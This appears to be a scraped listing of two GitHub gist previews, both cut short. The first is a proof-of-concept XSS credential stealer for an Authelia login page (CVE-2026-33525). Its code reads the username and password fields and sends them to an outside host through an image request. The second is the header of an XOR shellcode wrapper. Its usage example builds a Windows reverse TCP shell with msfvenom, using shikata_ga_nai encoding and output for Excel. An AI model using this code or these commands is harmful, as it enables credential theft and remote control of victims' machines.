Josh interspective
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Authelia v4.39.15 Language Cookie XSS creds stealer PoC (CVE-2026-33525) | |
| // https://www.stratussecurity.com/post/chaining-xss-to-steal-credentials-from-authelia-login-page | |
| (function () { | |
| console.log("Observer script loaded"); | |
| function stealAll(usernameField, passwordField) { | |
| const fullData = 'u=' + encodeURIComponent(usernameField.value) + '&p=' + encodeURIComponent(passwordField.value); | |
| const img = new Image(); | |
| img.src = 'https://10.22.11.10/steal?' + fullData; |
interspective
/ xor-payload.py
Created
September 29, 2015 22:57
— forked from hugsy/xor-payload.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| XOR-encoded shellcode wrapper for Windows x86-32 (works fine on x86-64) | |
| Example: | |
| $ msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai \ | |
| --format raw -b '\x00\xff' LHOST=192.168.56.1 LPORT=8080 \ | |
| 2>/dev/null | python xor-payload.py --excel | |
| @_hugsy_ |